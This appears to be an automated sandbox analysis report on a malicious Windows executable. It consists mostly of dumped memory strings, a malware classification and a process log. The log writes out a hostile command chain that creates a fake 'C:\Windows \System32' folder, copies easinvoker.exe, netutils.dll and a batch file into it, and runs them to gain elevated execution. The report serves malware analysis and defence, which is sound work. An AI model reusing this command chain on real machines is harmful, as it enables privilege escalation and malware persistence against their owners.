IsStereoWM/MediaOriginalBroadcastDateTimeWM/VideoClosedCaptioningWM/MediaIsRepeatWM/MediaIsLiveWM/MediaIsTapeWM/MediaIsDelayWM/MediaIsSubtitledWM/MediaIsPremiereWM/MediaIsFinaleWM/MediaIsSAPWM/ProviderCopyrightWM/ISANWM/ADIDWM/WMShadowFileSourceFileTypeWM/WMShadowFileSourceDRMTypeWM/WMCPDistributorWM/WMCPDistributorIDWM/SeasonNumberWM/EpisodeNumberEarlyDataDeliveryJustInTimeDecodeSingleOutputBufferSoftwareScalingDeliverOnReceiveScrambledAudioDedicatedDeliveryThreadEnableDiscreteOutputSpeakerConfigDynamicRangeControlAllowInterlacedOutputVideoSampleDurationsStreamLanguageEnableWMAProSPDIFOutputDeinterlaceModeInterlacedCodingInitialPatternForInverseTelecineJPEGCompressionQualityWatermarkCLSIDWatermarkConfigFixedFrameRate_SOURCEFORMATTAG_ORIGINALWAVEFORMAT_EDL_COMPLEXITYEX_DECODERCOMPLEXITYPROFILEReloadIndexOnSeekStreamNumIndexObjectsFailSeekOnErrorPermitSeeksBeyondEndOfStreamUsePacketAtSeekPointSourceBufferTimeSourceMaxBytesAtOnce_VBRENABLED_VBRQUALITY_RMAX_BMAXVBR PeakBuffer Average_COMPLEXITYEXMAX_COMPLEXITYEXOFFLINE_COMPLEXITYEXLIVE_ISVBRSUPPORTED_PASSESUSEDMusicSpeechClassModeMusicClassModeSpeechClassModeMixedClassModeSpeechFormatCapPeakValueAverageLevelFold6To2Channels3Fold%luTo%luChannels%luDeviceConformanceTemplateEnableFrameInterpolationNeedsPreviousSampleWM/IsCompilation\| vs 0vJrK0NCd1.exe
Source: 0vJrK0NCd1.exe, 00000000.00000003.369676506.0000000002E63000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameKernelbase.dllj% vs 0vJrK0NCd1.exe
Source: 0vJrK0NCd1.exe, 00000000.00000003.373985159.0000000002E68000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCOMCTL32.DLLj% vs 0vJrK0NCd1.exe
Source: 0vJrK0NCd1.exe, 00000000.00000003.422202761.0000000002F7F000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLOADER.EXEB vs 0vJrK0NCd1.exe
Source: 0vJrK0NCd1.exe, 00000000.00000003.396746922.0000000002BAC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCFGMGR32.DLLj% vs 0vJrK0NCd1.exe
Source: 0vJrK0NCd1.exe, 00000000.00000003.372135848.0000000002B72000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamecryptbase.dllj% vs 0vJrK0NCd1.exe
Source: 0vJrK0NCd1.exe, 00000000.00000003.372135848.0000000002B72000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamesecurity.dllj% vs 0vJrK0NCd1.exe
Source: 0vJrK0NCd1.exe, 00000000.00000003.372135848.0000000002B72000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamesechost.dllj% vs 0vJrK0NCd1.exe
Source: 0vJrK0NCd1.exe, 00000000.00000003.372135848.0000000002B72000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameadvapi32.dllj% vs 0vJrK0NCd1.exe
Source: 0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCRYPT32.DLLj% vs 0vJrK0NCd1.exe
Source: 0vJrK0NCd1.exe, 00000000.00000003.370202146.0000000002E65000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameuser32j% vs 0vJrK0NCd1.exe
Source: 0vJrK0NCd1.exe, 00000000.00000003.398684375.0000000002B72000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamefilterLib.dllj% vs 0vJrK0NCd1.exe
Source: 0vJrK0NCd1.exe, 00000000.00000003.398684375.0000000002B72000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamePROFAPI.DLLj% vs 0vJrK0NCd1.exe
Source: 0vJrK0NCd1.exe, 00000000.00000003.373786865.0000000002B72000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameVERSION.DLLj% vs 0vJrK0NCd1.exe
Source: 0vJrK0NCd1.exe, 00000000.00000003.373786865.0000000002B72000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamebcryptprimitives.dllj% vs 0vJrK0NCd1.exe
Source: 0vJrK0NCd1.exe, 00000000.00000003.422437505.0000000004E50000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLOADER.EXEB vs 0vJrK0NCd1.exe
Source: 0vJrK0NCd1.exe, 00000000.00000003.368861068.0000000002E80000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs 0vJrK0NCd1.exe
Source: 0vJrK0NCd1.exe, 00000000.00000003.386369418.0000000002E6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCLBCATQ.DLLj% vs 0vJrK0NCd1.exe
Source: 0vJrK0NCd1.exe, 00000000.00000002.471479679.000000001002F000.00000004.00000001.01000000.00000004.sdmp	Binary or memory string: OriginalFilenameLanguagePack vs 0vJrK0NCd1.exe
Source: 0vJrK0NCd1.exe, 00000000.00000003.422677307.0000000004E68000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLOADER.EXEB vs 0vJrK0NCd1.exe
Source: 0vJrK0NCd1.exe, 00000000.00000003.422159926.0000000002F7F000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLOADER.EXEB vs 0vJrK0NCd1.exe
Source: 0vJrK0NCd1.exe, 00000000.00000003.392885475.0000000003411000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUxTheme.dllj% vs 0vJrK0NCd1.exe
Source: 0vJrK0NCd1.exe, 00000000.00000003.379460711.0000000003419000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ItemHeightFirstItemOffsetSeparatorHeightTopIndexCircularSystem.Link.TargetUrlHostNameSystem.Link.TargetUrlSystem.Link.TargetUrlPathSystem.Link.DateVisitedSystem.History.SelectionCountSystem.RecordedTV.ProgramDescriptionSystem.Search.RankSystem.Link.TargetParsingPathSystem.History.TargetUrlHostNameSystem.History.VisitCountSystem.TitleSystem.AcquisitionIDSystem.Contact.WebPageSystem.ContentStatusSystem.RecordedTV.ChannelNumberSystem.ItemUrlSystem.ItemPathDisplaySystem.OriginalFileNameSystem.Media.UserWebUrlSystem.ItemFolderPathDisplaySystem.SubjectSystem.AuthorSystem.FileNameSystem.CategorySystem.SourceItemSystem.ItemNameDisplaySystem.ContentTypeSystem.DateCreatedSystem.DateModifiedSystem.Document.WordCountSystem.ItemFolderNameDisplaySystem.Link.FeedItemLocalIdSystem.Document.PageCountSmallIconsLockIconSizeNoToolbarCustomizeNoBandCustomizeBtn_SearchBtn_HistoryBtn_RefreshBtn_HomeBtn_ForwardBtn_StopSpecifyDefaultButtonsBtn_BackBtn_PrintBtn_EditBtn_MailNewsBtn_SizeBtn_FullscreenBtn_ToolsBtn_FavoritesBtn_FoldersNoInstrumentationNoWindowsUpdateBtn_EncodingBtn_PrintPreviewBtn_CopyBtn_PasteBtn_DiscussionsBtn_CutNoFileUrlNoChannelUIBtn_PageBtn_HelpBtn_PanningBtn_FeedsNoExpandedNewMenuBtn_MediaNoChannelLoggingNoManualUpdatesNoEditingSubscriptionsNoRemovingSubscriptionsNoRemovingChannelsNoAddingSubscriptionsNoAddingChannelsNoEditingChannelsMaxSubscriptionSizeMaxChannelCountNoEditingScheduleGroupsMaxChannelSizeNoChannelContentNoSubscriptionContentNoScheduledUpdatesNoUnattendedDialingMaxChannelLevelsNoSubscriptionPasswordsUpdateInNewProcessMaxWebcrawlLevelsUpdateExcludeBeginUpdateExcludeEndMaxSubscriptionCountMinUpdateIntervalUsePolicySearchProvidersOnlyNoFileOpenNoChangeDefaultSearchProviderAddPolicySearchProvidersNoSplashNoSearchBoxNoBrowserSaveWebCompleteNoSearchCustomizationNoBrowserCloseNoOpeninNewWndNoSelectDownloadDirNoBrowserContextMenuNoBrowserOptionsNoFavoritesNoFileNewNoBrowserSaveAsNoHelpItemTutorialNoHelpItemSendFeedbackNoToolbarOptionsAlwaysPromptWhenDownloadNoViewSourceRestGoMenuNoTheaterModeNoFindFilesNoPrintingNo_LaunchMediaBarNoAddressBarNoLinksBarNoBrowserBarsNoToolBarNoNavButtonsNoHelpMenuNoDefaultTextSizeNoExtensionManagementNoPopupManagementNo_MediaBarOnlineContentNoCrashDetectionRestrictionsRestrictionsToolbars\RestrictionsExplorer2\ vs 0vJrK0NCd1.exe
Source: 0vJrK0NCd1.exe, 00000000.00000003.369193151.0000000002389000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamekernel32j% vs 0vJrK0NCd1.exe
Source: 0vJrK0NCd1.exe, 00000000.00000003.422595078.0000000004E68000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLOADER.EXEB vs 0vJrK0NCd1.exe
Source: 0vJrK0NCd1.exe, 00000000.00000003.379261612.0000000002B72000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamefilterLib.dllj% vs 0vJrK0NCd1.exe
Source: 0vJrK0NCd1.exe, 00000000.00000003.379261612.0000000002B72000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamePOWRPROF.DLLj% vs 0vJrK0NCd1.exe
Source: 0vJrK0NCd1.exe, 00000000.00000003.390382927.0000000003B50000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameWindows.Storage.dllj% vs 0vJrK0NCd1.exe
Source: 0vJrK0NCd1.exe, 00000000.00000003.422700357.0000000004E68000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLOADER.EXEB vs 0vJrK0NCd1.exe
Source: 0vJrK0NCd1.exe, 00000000.00000003.384822240.0000000002B72000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLanguagePack vs 0vJrK0NCd1.exe
Source: 0vJrK0NCd1.exe, 00000000.00000003.384822240.0000000002B72000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamews2_32.dllj% vs 0vJrK0NCd1.exe
Source: 0vJrK0NCd1.exe, 00000000.00000003.385818708.0000000002E6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamefastprox.dllj% vs 0vJrK0NCd1.exe
Source: 0vJrK0NCd1.exe, 00000000.00000003.372628723.0000000003414000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCOMBASE.DLLj% vs 0vJrK0NCd1.exe
Source: 0vJrK0NCd1.exe, 00000000.00000003.421759155.0000000002F47000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLOADER.EXEB vs 0vJrK0NCd1.exe
Source: 0vJrK0NCd1.exe, 00000000.00000002.469716889.0000000004F3C000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameeasinvoker.exej% vs 0vJrK0NCd1.exe
Source: 0vJrK0NCd1.exe, 00000000.00000003.381746840.000000000341A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameIeRtUtil.dllD vs 0vJrK0NCd1.exe
Source: 0vJrK0NCd1.exe, 00000000.00000002.471795080.0000000010059000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLOADER.EXEB vs 0vJrK0NCd1.exe
Source: 0vJrK0NCd1.exe, 00000000.00000003.370600881.0000000002EDB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamegdi32j% vs 0vJrK0NCd1.exe

Source: C:\Users\user\Desktop\0vJrK0NCd1.exe

File created: C:\Users\Public\Libraries\Elpuxpki.PIF

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winEXE@42/20@5/3

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\0vJrK0NCd1.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\Desktop\0vJrK0NCd1.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\Public\Libraries\Elpuxpki.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\Elpuxpki.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\Elpuxpki.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\Elpuxpki.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales

Source: C:\Users\user\Desktop\0vJrK0NCd1.exe

File created: C:\Program Files\Common Files\System\symsrv.dll

Jump to behavior

Source: 0vJrK0NCd1.exe, 00000000.00000003.374356345.0000000003418000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: @ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/AppExplorer.AssocActionId.BurnSelectionExplorer.AssocActionId.CloseSessionIehistoryIerssJavascriptJscriptLDAPResrloginStickyNotesExplorer.AssocActionId.EraseDiscExplorer.AssocActionId.ZipSelectionExplorer.AssocProtocol.search-msExplorer.BurnSelectionExplorer.CloseSessionExplorer.EraseDiscExplorer.ZipSelectionFile.adp.app.application.appref-ms.asp.bas.cnt.cpftelnettn3270VbscriptwindowsmediacenterappwindowsmediacentersslwindowsmediacenterwebWMP11.AssocProtocol.MMS.ade.hlp.hme.hpj.hta.ins.isp.its.jse.cpl.crd.crds.crt.csh.fxp.gadget.grp.mat.mau.mav.maw.mcf.mda.mde.mdt.ksh.mad.maf.mag.mam.maq.mar.mas.mshxml.mst.ops.pcd.pl.plg.prf.prg.mdw.mdz.msc.msh.msh1.msh1xml.msh2.msh2xml.pvw.plsc.rb.rbw.rdp.rgu.scf.scr.printerexport.provxml.ps2.ps2xml.psc2.py.pyc.pyo.vsw.webpnp.ws.wsc.wsh.xaml.xdp.xip.shb.shs.theme.tsk.vb.vbe.vbp.vsmacros.xnkBRITNLSVDAFIHUNOENDEJAKOTWCNFRHEEUISsr-Latn-CSsr-SP-Latnsr-Cyrl-CSsr-SP-Cyrlsr-Latn-BAELPLRUCSPTSKSLARbs-BA-Latnzh-Hantzh-CHTzh-Hanszh-CHSsr-BA-Latnsr-Cyrl-BAsr-BA-Cyrliu-Latn-CAiu-CA-Latnbs-Cyrl-BAbs-BA-Cyrlbs-Latn-BAdadeelenesfifrhearbgcarmroruhrsksqsvthhuisitjakonlplptfavihyazeuhsbmksttrurukbeetlvlttghimtsegayimskkkytstnvexhzuafkafotateknmlasmrsamnswtkuzttbnpaguorsdsyrsichriuamtzmksbocykmlomyglkokmniibbyoquznsobalbklignefypsfildvbinffhapaparnmohbrugmioccokromtignhawlasoiiar-SAbg-BGca-ESzh-TWcs-CZda-DKde-DEel-GRgswsahqucrwwoprsgdkuja-JPko-KRnl-NLnb-NOpl-PLpt-BRrm-CHro-ROen-USes-ES_tradnlfi-FIfr-FRhe-ILhu-HUis-ISit-ITid-IDuk-UAbe-BYsl-SIet-EElv-LVlt-LTtg-Cyrl-TJru-RUhr-HRsk-SKsq-ALsv-SEth-THtr-TRur-PKts-ZAtn-ZAve-ZAxh-ZAzu-ZAaf-ZAka-GEfo-FOfa-IRvi-VNhy-AMaz-Latn-AZeu-EShsb-DEmk-MKst-ZAtk-TMuz-Latn-UZtt-RUbn-INpa-INgu-INor-INta-INhi-INmt-MTse-NOyi-001ms-MYkk-KZky-KGsw-KEcy-GBkm-KHlo-LAmy-MMgl-ESkok-INmni-INsd-Deva-INte-INkn-INml-INas-INmr-INsa-INmn-MNbo-CNfy-NLps-AFfil-PHdv-MVbin-NGff-NGha-Latn-NGibb-NGsyr-SYsi-LKchr-Cher-USiu-Cans-CAam-ETtzm-Arab-MAks-Arabne-NPom-ETti-ETgn-PYhaw-USla-001so-SOii-CNpap-029yo-NGquz-BOnso-ZAba-RUlb-LUkl-GLig-NGkr-NGsah-RUquc-Latn-GTrw-RWwo-SNprs-AFgd-GBku-Arab-IQqps-plocarn-CLmoh-CAbr-FRug-CNmi-NZoc-FRco-FRgsw-FRit-CHnl-BEnn-NOpt-PTro-MDru-MDsv-FIur-INqps-plocaar-IQca-ES-valenciazh-CNde-CHen-GBes-MXfr-BEpa-Arab-PKta-LKmn-Mong-CNsd-Arab-PKtzm-Latn-DZks-Deva-INne-INff-Latn-SNaz-Cyrl-AZdsb-DEtn-BWse-SEga-IEms-BNuz-Cyrl-UZbn-BDes-ESfr-CAse-FImn-Mong-MNdz-BTquz-PEar-LYzh-SGquz-ECti-ERqps-Latn-x-shqps-plocmar-EGzh-HKde-ATen-AUzh-MOde-LIen-NZes-CRfr-LUsmj-SEar-MAen-IEde-LUen-CAes-GTfr-CHhr-BAsmj-NOtzm-Tfng-MAar-DZar-OMen-JMes-VEfr-REsms-FIar-YEen-029es-COes-PAfr-MCsma-NOar-TNen-ZAes-DOfr-029sma-SEar-JOen-TTes-ARfr-CMsr-Latn-MEar-LBen-ZWes-ECfr-CDsr-Latn-RSsmn-FIar-SYen-BZes-PEfr-SNsr-Cyrl-RSes-UYfr-MAar-BHen-HKes-PYfr-HTar-QAen-INfr-CIsr-Cyrl-MEar-KWen-PHes-CLfr-MLar-AEen-IDes-419es-CUbs-Cyrlbs-Latnsr-Cyrlsr-Latnsmnaz-Cyrles-BOen-MYes-SVen-SGes-HNes-NIes-PRes-USiu-Canstzm-Tfngnbsrtg-Cyrldsbsmjuz-Latnsmszhnnbsaz-Latnsmauz-Cyrlmn-Cyrlquc-Lat
Source: 0vJrK0NCd1.exe, 00000000.00000003.381746840.000000000341A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ori.nznet.nzorg.nzparliament.nzschool.nzco.omcom.omedu.omgov.ommed.ommuseum.omnet.omorg.ompro.omac.pagob.pacom.paorg.pasld.paedu.panet.paing.paabo.pamed.panom.paedu.pegob.penom.pemil.peorg.pecom.penet.pecom.pforg.pfedu.pfcom.phnet.phorg.phgov.phedu.phngo.phmil.phi.phcom.pknet.pkedu.pkorg.pkfam.pkbiz.pkweb.pkgov.pkgob.pkgok.pkgon.pkgop.pkgos.pkinfo.pkcom.plnet.plorg.plaid.plagro.platm.plauto.plbiz.pledu.plgmina.plgsm.plinfo.plmail.plmiasta.plmedia.plmil.plnieruchomosci.plnom.plpc.plpowiat.plpriv.plrealestate.plrel.plsex.plshop.plsklep.plsos.plszkola.pltargi.pltm.pltourism.pltravel.plturystyka.plgov.plap.gov.plic.gov.plis.gov.plus.gov.plkmpsp.gov.plkppsp.gov.plkwpsp.gov.plpsp.gov.plwskr.gov.plkwp.gov.plmw.gov.plug.gov.plum.gov.plumig.gov.plugim.gov.plupow.gov.pluw.gov.plstarostwo.gov.plpa.gov.plpo.gov.plpsse.gov.plpup.gov.plrzgw.gov.plsa.gov.plso.gov.plsr.gov.plwsa.gov.plsko.gov.pluzs.gov.plwiih.gov.plwinb.gov.plpinb.gov.plwios.gov.plwitd.gov.plwzmiuw.gov.plpiw.gov.plwiw.gov.plgriw.gov.plwif.gov.ploum.gov.plsdn.gov.plzp.gov.pluppo.gov.plmup.gov.plwuoz.gov.plkonsulat.gov.ploirm.gov.plaugustow.plbabia-gora.plbedzin.plbeskidy.plbialowieza.plbialystok.plbielawa.plbieszczady.plboleslawiec.plbydgoszcz.plbytom.plcieszyn.plczeladz.plczest.pldlugoleka.plelblag.plelk.plglogow.plgniezno.plgorlice.plgrajewo.plilawa.pljaworzno.pljelenia-gora.pljgora.plkalisz.plkazimierz-dolny.plkarpacz.plkartuzy.plkaszuby.plkatowice.plkepno.plketrzyn.plklodzko.plkobierzyce.plkolobrzeg.plkonin.plkonskowola.plkutno.pllapy.pllebork.pllegnica.pllezajsk.pllimanowa.pllomza.pllowicz.pllubin.pllukow.plmalbork.plmalopolska.plmazowsze.plmazury.plmielec.plmielno.plmragowo.plnaklo.plnowaruda.plnysa.plolawa.plolecko.plolkusz.plolsztyn.plopoczno.plopole.plostroda.plostroleka.plostrowiec.plostrowwlkp.plpila.plpisz.plpodhale.plpodlasie.plpolkowice.plpomorze.plpomorskie.plprochowice.plpruszkow.plprzeworsk.plpulawy.plradom.plrawa-maz.plrybnik.plrzeszow.plsanok.plsejny.plslask.plslupsk.plsosnowiec.plstalowa-wola.plskoczow.plstarachowice.plstargard.plsuwalki.plswidnica.plswiebodzin.plswinoujscie.plszczecin.plszczytno.pltarnobrzeg.pltgory.plturek.pltychy.plustka.plwalbrzych.plwarmia.plwarszawa.plwaw.plwegrow.plwielun.plwlocl.plwloclawek.plwodzislaw.plwolomin.plwroclaw.plzachpomor.plzagan.plzarow.plzgora.plzgorzelec.plgov.pnco.pnorg.pnedu.pnnet.pncom.prnet.prorg.prgov.predu.prisla.prpro.prbiz.prinfo.prname.prest.prprof.prac.praaa.proaca.proacct.proavocat.probar.procpa.proeng.projur.prolaw.promed.prorecht.proedu.psgov.pssec.psplo.pscom.psorg.psnet.psnet.ptgov.ptorg.ptedu.ptint.ptpubl.ptcom.ptnome.ptco.pwne.pwor.pwed.pwgo.pwbelau.pwcom.pycoop.pyedu.pygov.pymil.pynet.pyorg.pycom.qaedu.qagov.qamil.qaname.qanet.qaorg.qasch.qaasso.recom.renom.rearts.rocom.rofirm.roinfo.ronom.ront.roorg.rorec.rostore.rotm.rowww.roac.rsco.rsedu.rsgov.rsin.rsorg.rsac.ruedu.rugov.ruint.rumil.rutest.rugov.rwnet.rwedu.rwac.rwcom.rwco.rwint.rwmil.rwgouv.rwcom.sanet.saorg.sagov.samed.sapub.saedu.sasch.sacom.sbedu.sbgov.sbnet.sbor
Source: 0vJrK0NCd1.exe, 00000000.00000003.376967182.000000000341B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: .xlsmMicrosoft.Office.Desktop_8wekyb3d8bbwe!Excel.dot.dotx.docmMicrosoft.Office.Desktop_8wekyb3d8bbwe!WordMicrosoft.Office.Desktop_8wekyb3d8bbwe!PowerPoint.ods.xla.xlam.xlt.xltm.xltx.xlsb.pps.ppsm.ppsx.thmx.pot.potm.potx.pptmms-powerpointms-excelms-word.odp.ppa.ppamABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/Explorer.AssocActionId.CloseSessionExplorer.AssocActionId.EraseDiscExplorer.AssocActionId.ZipSelectionExplorer.AssocProtocol.search-msExplorer.BurnSelectionExplorer.CloseSessionExplorer.EraseDiscExplorer.ZipSelectionAppExplorer.AssocActionId.BurnSelectionStickyNotestelnettn3270VbscriptwindowsmediacenterappwindowsmediacentersslwindowsmediacenterwebWMP11.AssocProtocol.MMSFileIehistoryIerssJavascriptJscriptLDAPResrlogin.cpf.crd.crds.crt.csh.fxp.gadget.grp.ade.adp.app.application.appref-ms.asp.bas.cnt.ksh.mad.maf.mag.mam.maq.mar.mas.hlp.hme.hpj.hta.ins.isp.its.jse.mdw.mdz.msc.msh.msh1.msh1xml.msh2.msh2xml.mat.mau.mav.maw.mcf.mda.mde.mdt.printerexport.provxml.ps2.ps2xml.psc2.py.pyc.pyo.mshxml.mst.ops.pcd.pl.plg.prf.prg.shb.shs.theme.tsk.vb.vbe.vbp.vsmacros.pvw.plsc.rb.rbw.rdp.rgu.scf.scr.xnk.vsw.webpnp.ws.wsc.wsh.xaml.xdp.xipKOTWCNFRBRITNLSVENDEJAPTTRSKSLARHEEUISDAFIHUNOELPLRUCSiu-Latn-CAiu-CA-Latnbs-Cyrl-BAbs-BA-Cyrlbs-Latn-BAbs-BA-Latnzh-Hantzh-CHTsr-Latn-CSsr-SP-Latnsr-Cyrl-CSsr-SP-Cyrlsr-Latn-BAsr-BA-Latnsr-Cyrl-BAsr-BA-Cyrlzh-Hanszh-CHSarbgcacsdadeitjakonlplptrmroelenesfifrhehuisukbesletlvlttgfaruhrsksqsvthtrurtnvexhzuafkafohivihyazeuhsbmksttstkuzttbnpaguortamtsegayimskkkyswcykmlomyglkokmnisdteknmlasmrsamnbofypsfildvbinffhaibbsyrsichriuamtzmksneomtignhawlasoiipapyoquznsobalbkligkrsahqucrwwoprsgdkuar-SAarnmohbrugmioccogswes-ES_tradnlfi-FIfr-FRhe-ILhu-HUis-ISit-ITja-JPbg-BGca-ESzh-TWcs-CZda-DKde-DEel-GRen-UShr-HRsk-SKsq-ALsv-SEth-THtr-TRur-PKid-IDko-KRnl-NLnb-NOpl-PLpt-BRrm-CHro-ROru-RUvi-VNhy-AMaz-Latn-AZeu-EShsb-DEmk-MKst-ZAts-ZAuk-UAbe-BYsl-SIet-EElv-LVlt-LTtg-Cyrl-TJfa-IRmt-MTse-NOyi-001ms-MYkk-KZky-KGsw-KEtk-TMtn-ZAve-ZAxh-ZAzu-ZAaf-ZAka-GEfo-FOhi-INkn-INml-INas-INmr-INsa-INmn-MNbo-CNcy-GBuz-Latn-UZtt-RUbn-INpa-INgu-INor-INta-INte-INsi-LKchr-Cher-USiu-Cans-CAam-ETtzm-Arab-MAks-Arabne-NPfy-NLkm-KHlo-LAmy-MMgl-ESkok-INmni-INsd-Deva-INsyr-SYquz-BOnso-ZAba-RUlb-LUkl-GLig-NGkr-NGom-ETps-AFfil-PHdv-MVbin-NGff-NGha-Latn-NGibb-NGyo-NGmoh-CAbr-FRug-CNmi-NZoc-FRco-FRgsw-FRsah-RUti-ETgn-PYhaw-USla-001so-SOii-CNpap-029arn-CLar-IQca-ES-valenciazh-CNde-CHen-GBes-MXfr-BEit-CHquc-Latn-GTrw-RWwo-SNprs-AFgd-GBku-Arab-IQqps-plocqps-plocadsb-DEtn-BWse-SEga-IEms-BNuz-Cyrl-UZbn-BDpa-Arab-PKnl-BEnn-NOpt-PTro-MDru-MDsv-FIur-INaz-Cyrl-AZti-ERqps-Latn-x-shqps-plocmar-EGzh-HKde-ATen-AUes-ESta-LKmn-Mong-CNsd-Arab-PKtzm-Latn-DZks-Deva-INne-INff-Latn-SNquz-ECen-CAes-GTfr-CHhr-BAsmj-NOtzm-Tfng-MAar-DZzh-MOfr-CAse-FImn-Mong-MNdz-BTquz-PEar-LYzh-SGde-LUfr-MCsma-NOar-TNen-ZAes-DOfr-029sma-SEar-OMde-LIen-NZes-CRfr-LUsmj-SEar-MAen-IEes-PAsr-Latn-RSsmn-FIar-SYen-BZes-PEfr-SNsr-Cyrl-RSar-JOen-JMes-VEfr-REsms-FIar-YEen-029es-COfr-CDsr-Cyrl-MEar-KWen-PHes-CLf

Source: C:\Users\user\Desktop\0vJrK0NCd1.exe

Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\ElpuxpkiO.bat" "

Source: 0vJrK0NCd1.exe	ReversingLabs: Detection: 92%
Source: 0vJrK0NCd1.exe	Virustotal: Detection: 84%

Source: C:\Users\user\Desktop\0vJrK0NCd1.exe

File read: C:\Users\user\Desktop\0vJrK0NCd1.exe

Jump to behavior

Source: C:\Users\user\Desktop\0vJrK0NCd1.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\0vJrK0NCd1.exe C:\Users\user\Desktop\0vJrK0NCd1.exe
Source: C:\Users\user\Desktop\0vJrK0NCd1.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\ElpuxpkiO.bat" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c mkdir "\\?\C:\Windows "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c mkdir "\\?\C:\Windows \System32"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c ECHO F
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\xcopy.exe xcopy "easinvoker.exe" "C:\Windows \System32\" /K /D /H /Y
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c ECHO F
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\xcopy.exe xcopy "netutils.dll" "C:\Windows \System32\" /K /D /H /Y
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c ECHO F
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\xcopy.exe xcopy "KDECO.bat" "C:\Windows \System32\" /K /D /H /Y
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows \System32\easinvoker.exe C:\Windows \System32\easinvoker.exe
Source: C:\Windows \System32\easinvoker.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\windows \system32\KDECO.bat""
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
